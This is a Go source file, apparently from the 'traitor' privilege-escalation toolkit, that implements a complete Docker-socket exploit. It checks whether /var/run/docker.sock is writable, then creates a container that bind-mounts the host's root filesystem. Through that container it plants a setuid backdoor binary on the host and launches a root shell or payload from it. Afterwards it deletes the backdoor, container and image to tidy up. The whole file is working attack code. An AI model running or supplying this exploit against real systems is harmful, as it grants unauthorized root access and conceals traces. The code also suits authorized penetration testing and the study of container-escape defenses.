package dockersock

import (
	"archive/tar"
	"bytes"
	"context"
	"encoding/json"
	"fmt"
	"io"
	"io/ioutil"
	"net"
	"net/http"
	"os"
	"os/exec"
	"path/filepath"
	"strings"
	"syscall"
	"time"

	"github.com/liamg/traitor/pkg/random"

	"github.com/liamg/traitor/pkg/payloads"

	"github.com/liamg/traitor/pkg/logger"

	"github.com/liamg/traitor/pkg/state"
)

// writableDockerSocketExploit holds what is needed to talk to a Docker daemon
// through its unix socket: the socket path and an HTTP client bound to it.
type writableDockerSocketExploit struct {
	// sockPath is the filesystem path of the Docker unix socket.
	sockPath string
	// client issues the Docker API requests; New configures its transport to
	// dial sockPath regardless of the host named in the request URL.
	client *http.Client
}

// New returns an exploit instance targeting /var/run/docker.sock.
//
// The embedded HTTP client ignores the network and address of every request
// and always connects to the unix socket at sockPath, so request URLs only
// need a placeholder host. Each request is limited to ten seconds overall.
func New() *writableDockerSocketExploit {
	exp := &writableDockerSocketExploit{
		sockPath: "/var/run/docker.sock",
	}

	// A Dialer (rather than net.Dial) lets the request context reach the
	// connect call, so cancellation and deadlines also abort a pending dial.
	var dialer net.Dialer
	exp.client = &http.Client{
		Transport: &http.Transport{
			// sockPath is read through exp at dial time, so later changes to
			// the field are picked up by subsequent connections.
			DialContext: func(ctx context.Context, _, _ string) (net.Conn, error) {
				return dialer.DialContext(ctx, "unix", exp.sockPath)
			},
		},
		Timeout: 10 * time.Second,
	}
	return exp
}

// IsVulnerable reports whether the access check on the Docker socket path
// succeeds for the current process, logging a message when it does. The
// context and state arguments are not used.
func (v *writableDockerSocketExploit) IsVulnerable(_ context.Context, _ *state.State, log logger.Logger) bool {
	// NOTE(review): O_RDWR is an open(2) flag rather than an access(2) mode;
	// on Linux its value (2) matches W_OK, so this appears to test write
	// permission only - confirm that is the intent.
	writable := syscall.Access(v.sockPath, syscall.O_RDWR) == nil
	if writable {
		log.Printf("Docker socket at %s is writable!", v.sockPath)
	}
	return writable
}

// Shell runs the exploit with payloads.Defer as the payload, which
// exploitWithImage announces as dropping the user into a shell rather than
// running a specific payload. It returns whatever Exploit returns.
func (v *writableDockerSocketExploit) Shell(ctx context.Context, s *state.State, log logger.Logger) error {
	return v.Exploit(ctx, s, log, payloads.Defer)
}

// deleteContainer sends DELETE /containers/{id}?force=1 to the daemon.
// It returns the transport error if the request could not be made, or a
// "delete failed" error carrying the status code when the daemon answers
// with a status of 400 or above.
func (v *writableDockerSocketExploit) deleteContainer(id string) error {
	endpoint := "http://localhost/containers/" + id + "?force=1"

	request, err := http.NewRequest(http.MethodDelete, endpoint, nil)
	if err != nil {
		return err
	}

	response, err := v.client.Do(request)
	if err != nil {
		return err
	}
	defer response.Body.Close()

	if status := response.StatusCode; status >= 400 {
		return fmt.Errorf("delete failed, status: %d", status)
	}
	return nil
}

// deleteImage sends DELETE /images/{name}?force=1 to the daemon.
// A failure to build or send the request is returned unchanged; a response
// status of 400 or above is turned into a "delete failed" error that
// includes the status code.
func (v *writableDockerSocketExploit) deleteImage(name string) error {
	target := "http://localhost/images/" + name + "?force=1"

	request, err := http.NewRequest(http.MethodDelete, target, nil)
	if err != nil {
		return err
	}

	response, err := v.client.Do(request)
	if err != nil {
		return err
	}
	defer response.Body.Close()

	if response.StatusCode < 400 {
		return nil
	}
	return fmt.Errorf("delete failed, status: %d", response.StatusCode)
}

// Exploit attempts the Docker socket escalation and then runs payload.
//
// It first asks the daemon to build a throwaway image from the in-memory
// build context produced by buildTarball. If the daemon answers 200, that
// image is handed to exploitWithImage with removeAfterwards set. Otherwise
// every tag returned by listLocalImages is tried in turn until one attempt
// succeeds.
//
// ctx bounds the build request, the pause after a successful build and the
// fallback loop; exploitWithImage itself does not take a context. s is not
// used. The returned error is nil when an attempt succeeded, the error from
// the step that failed, or "no image available" when every local image
// failed (or none exist).
func (v *writableDockerSocketExploit) Exploit(ctx context.Context, s *state.State, log logger.Logger, payload payloads.Payload) error {
	if ctx == nil {
		// The context used to be ignored entirely, so keep tolerating nil.
		ctx = context.Background()
	}

	log.Printf("Building malicious docker image...")

	var buildContext bytes.Buffer
	if err := v.buildTarball(&buildContext); err != nil {
		return fmt.Errorf("creating build context: %w", err)
	}

	imageName := random.Image()
	req, err := http.NewRequestWithContext(
		ctx,
		http.MethodPost,
		fmt.Sprintf("http://localhost/build?t=%s", imageName),
		&buildContext,
	)
	if err != nil {
		return fmt.Errorf("preparing image build request: %w", err)
	}
	req.Header.Set("Content-Type", "application/x-tar")

	resp, err := v.client.Do(req)
	if err != nil {
		return fmt.Errorf("requesting image build: %w", err)
	}
	defer resp.Body.Close()

	// The build output itself is not needed; stream it away instead of
	// buffering it all in memory. Reading to the end waits for the daemon
	// to finish responding.
	if _, err := io.Copy(io.Discard, resp.Body); err != nil {
		return fmt.Errorf("reading image build output: %w", err)
	}

	if resp.StatusCode == http.StatusOK {
		// weird race condition when running an image that was just built -
		// pausing for a second solves it
		select {
		case <-ctx.Done():
			return ctx.Err()
		case <-time.After(time.Second):
		}
		return v.exploitWithImage(imageName, true, payload, log)
	}

	log.Printf("Build failed, looking for existing images instead...")

	// The daemon rejected the build, so fall back to images that already
	// exist locally and try each of them.
	images, err := v.listLocalImages()
	if err != nil {
		return err
	}
	for _, image := range images {
		if err := ctx.Err(); err != nil {
			return err
		}
		if err := v.exploitWithImage(image, false, payload, log); err != nil {
			log.Printf("Exploit failed with image '%s': %s", image, err)
			continue
		}
		return nil
	}

	return fmt.Errorf("no image available")
}

// buildTarball writes a tar archive containing a single "Dockerfile" entry
// to writer, for use as a Docker build context.
//
// The archive is only complete once the tar writer has been closed, because
// Close emits the entry padding and the end-of-archive blocks. Its error is
// therefore returned rather than discarded, so a truncated archive is never
// reported as success.
func (v *writableDockerSocketExploit) buildTarball(writer io.Writer) error {
	const dockerfile = `FROM scratch

CMD echo "" > /lol
`

	tarWriter := tar.NewWriter(writer)

	header := &tar.Header{
		Name:    "Dockerfile",
		Size:    int64(len(dockerfile)),
		Mode:    0644,
		ModTime: time.Now(),
	}
	if err := tarWriter.WriteHeader(header); err != nil {
		return fmt.Errorf("writing Dockerfile header: %w", err)
	}

	if _, err := io.Copy(tarWriter, strings.NewReader(dockerfile)); err != nil {
		return fmt.Errorf("writing Dockerfile contents: %w", err)
	}

	if err := tarWriter.Close(); err != nil {
		return fmt.Errorf("finalising build context: %w", err)
	}
	return nil
}

// listLocalImages queries GET /images/json and returns the RepoTags of every
// image in the response, flattened into one slice in response order.
//
// It returns an error when the request fails, when the daemon answers with
// anything other than 200, or when the body is not the expected JSON array.
// The result is nil when the daemon reports no tags.
func (v *writableDockerSocketExploit) listLocalImages() ([]string, error) {

	resp, err := v.client.Get(
		"http://localhost/images/json",
	)
	if err != nil {
		return nil, err
	}
	// Registered before the status check so the body is also released on the
	// non-200 early return.
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("failed to list images, status: %d", resp.StatusCode)
	}

	data, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		return nil, err
	}

	var images []struct {
		Tags []string `json:"RepoTags"`
	}
	if err := json.Unmarshal(data, &images); err != nil {
		return nil, err
	}

	var imageList []string
	for _, image := range images {
		imageList = append(imageList, image.Tags...)
	}

	return imageList, nil
}

// exploitWithImage performs one attempt using the given image.
//
// Steps, in order:
//  1. choose a target path for the helper binary: a random file name in the
//     directory that contains `sh`, or in "/" when sh cannot be located;
//  2. create a container from image that bind-mounts the host "/" at /pwn
//     and runs this executable with "backdoor install" against that path;
//  3. start the container and wait for it to exit;
//  4. verify the file at path has the setuid bit, then start it with the
//     "setuid" argument (plus "-c payload" when payload is non-empty);
//  5. clean up (uninstall the helper, delete the container, and delete the
//     image when removeAfterwards is true);
//  6. wait for the started process to finish.
//
// Any failure before the process is started is returned immediately. Once
// the process is running, cleanup failures are logged and remembered but
// never cut the function short: all cleanup steps run and the process is
// always waited on. The first cleanup error takes precedence over the wait
// result in the returned error.
func (v *writableDockerSocketExploit) exploitWithImage(image string, removeAfterwards bool, payload payloads.Payload, log logger.Logger) error {

	binPath := "/"
	if shPath, err := exec.LookPath("sh"); err == nil {
		binPath = filepath.Dir(shPath)
	}
	path := filepath.Join(binPath, random.Filename())

	me, err := os.Executable()
	if err != nil {
		return err
	}

	log.Printf("Creating evil container...")

	// Marshal the request instead of formatting it by hand so that image
	// names and paths containing quotes or backslashes still yield valid
	// JSON. Field names double as the JSON keys.
	type bindMount struct {
		Type   string
		Source string
		Target string
	}
	creationData, err := json.Marshal(struct {
		Image      string
		Cmd        []string
		DetachKeys string
		OpenStdin  bool
		Mounts     []bindMount
	}{
		Image:      image,
		Cmd:        []string{"/pwn" + me, "backdoor", "install", "/pwn" + path},
		DetachKeys: "Ctrl-p,Ctrl-q",
		OpenStdin:  true,
		Mounts:     []bindMount{{Type: "bind", Source: "/", Target: "/pwn"}},
	})
	if err != nil {
		return err
	}

	resp, err := v.client.Post("http://localhost/containers/create", "application/json", bytes.NewReader(creationData))
	if err != nil {
		return err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusCreated {
		return fmt.Errorf("docker api error - unexpected status code: %d", resp.StatusCode)
	}

	data, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		return err
	}

	container := struct {
		ID string `json:"Id"`
	}{}
	if err := json.Unmarshal(data, &container); err != nil {
		return err
	}

	if container.ID == "" {
		return fmt.Errorf("failed to create container: %s", string(data))
	}

	log.Printf("Starting evil container...")
	respStart, err := v.client.Post(fmt.Sprintf("http://localhost/containers/%s/start", container.ID), "application/json", nil)
	if err != nil {
		return err
	}
	defer respStart.Body.Close()
	// Best-effort drain; the body content is not needed.
	_, _ = io.Copy(io.Discard, respStart.Body)
	if respStart.StatusCode != http.StatusNoContent {
		return fmt.Errorf("docker api error - unexpected status code: %d", respStart.StatusCode)
	}

	log.Printf("Backdooring host at %s from guest...", path)
	waitResp, err := v.client.Post(fmt.Sprintf("http://localhost/containers/%s/wait", container.ID), "application/json", nil)
	if err != nil {
		return err
	}
	defer waitResp.Body.Close()
	if waitResp.StatusCode != http.StatusOK {
		return fmt.Errorf("docker api error - unexpected status code: %d", waitResp.StatusCode)
	}
	// Best-effort drain; the body content is not needed.
	_, _ = io.Copy(io.Discard, waitResp.Body)

	// race condition immediately after setting setuid?
	time.Sleep(time.Second * 10)

	log.Printf("Checking permissions...")
	info, err := os.Stat(path)
	if err != nil {
		return err
	}
	if info.Mode()&os.ModeSetuid == 0 {
		return fmt.Errorf("setuid is not set: %o", info.Mode())
	}

	log.Printf("Starting root shell...")
	cmd := exec.Cmd{
		Path:   path,
		Args:   []string{path, "setuid"},
		Env:    os.Environ(),
		Dir:    "/",
		Stdin:  os.Stdin,
		Stdout: os.Stdout,
		Stderr: os.Stderr,
	}
	if payload != "" {
		cmd.Args = append(cmd.Args, "-c", string(payload))
	}
	if err := cmd.Start(); err != nil {
		return err
	}

	// The child is now running with our stdio attached. Returning without
	// Wait would orphan it, so from here on cleanup failures are recorded
	// rather than returned on the spot, and the remaining steps still run.
	var cleanupErr error
	recordCleanup := func(step string, err error) {
		if err == nil {
			return
		}
		log.Printf("%s failed: %s", step, err)
		if cleanupErr == nil {
			cleanupErr = fmt.Errorf("%s: %w", step, err)
		}
	}

	log.Printf("Removing backdoor from host...")
	recordCleanup("removing backdoor", (&exec.Cmd{
		Path: path,
		Args: []string{path, "backdoor", "uninstall"},
		Env:  os.Environ(),
	}).Run())

	log.Printf("Removing container...")
	recordCleanup("removing container", v.deleteContainer(container.ID))

	if removeAfterwards {
		log.Printf("Cleaning up image...")
		recordCleanup("removing image", v.deleteImage(image))
	}

	if payload == payloads.Defer {
		log.Printf("Dropping you into a shell...")
	} else {
		log.Printf("Running payload...")
	}

	waitErr := cmd.Wait()
	if cleanupErr != nil {
		return cleanupErr
	}
	return waitErr
}
